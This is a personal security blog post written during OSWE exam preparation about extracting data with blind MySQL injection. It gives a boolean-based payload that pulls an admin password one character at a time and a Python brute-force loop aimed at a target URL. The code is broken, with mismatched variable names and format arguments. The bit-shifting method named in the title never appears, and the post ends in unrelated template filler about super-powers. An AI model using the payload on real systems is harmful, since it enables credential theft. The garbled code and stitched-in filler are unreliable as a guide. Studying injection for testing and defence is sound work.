Ender Loc Phan
Ender Loc Phan
Common vuls in Mobile Apps
Thinking about Requests
NodeJS: Event-Stream Backdoor Analysis
Crypto Wallet Local Storage Attack
Capture The Coin Writeup
Understand Solidity Storage in depth
Burp Suite SSL Pinning
CORS
Secure Coding Experience For Java SE
Blind MySQL Injection Using Bit Shifting
About me
Powered by GitBook

Blind MySQL Injection Using Bit Shifting

Reasons?

My AWAE lab just ended today, while I'm having 3 days left to go for the OSWE exam. I've been living under stressful for almost 8 months before the course and during the course as well.

Just a word for OSWE is "amazing", I'd not say much about the course because many ppl out there already sharing about their thoughts in details. The thing I've learnt from AWAE course is MySQL, especially the blind one coz it's more advanced and much harder to extract the data compared to the classic SQLi.

I've been trying to find the fastest way to extract the data from the database in blind SQLi cases. I was wandering around exploit-db paper and finding out an interesting topic that I have not learned yet "Faster Blind MySQL Injection Using Bit Shifting". Read through the paper and I wanted to make a script for this to improve my brute-force mechanism.

Implementation

Case 1:

The trivial way to get extract the data is using substring or substr function. For example, we have a simple payload

test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='

If it's true, the headers['Content-Length'] will be greater than 20 and otherwise.

Usually, what we do is to brute force every each character of the password in this case, and compare the value of ascii(password) to the ASCII decimal.

Type: man ascii

The decimal set of ascii

So the python code should be

for i in range(1, 8):
     	injection_string = "test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='" % (inj,i)
     	for j in range(32, 126): #every possible character in the ASCII printable set
			target = "http://kubertu/index_public.php?q=%s" % (ip, inj_str.replace("[CHAR]", str(j)))
 			r = requests.get(target)
 			content_length = int(r.headers['Content-Length'])
 			if (content_length > 20):
 	    		return j

Becoming a super hero is a fairly straight forward process:

$ give me super-powers

Super-powers are granted randomly so please submit an issue if you're not happy with yours.

Once you're strong enough, save the world:

hello.sh
# Ain't no code for that yet, sorry
echo 'You got to trust me on this, I saved the world'

Previous
Secure Coding Experience For Java SE
Next
About me
Last updated 5 months ago
Contents
Reasons?
Implementation
Case 1: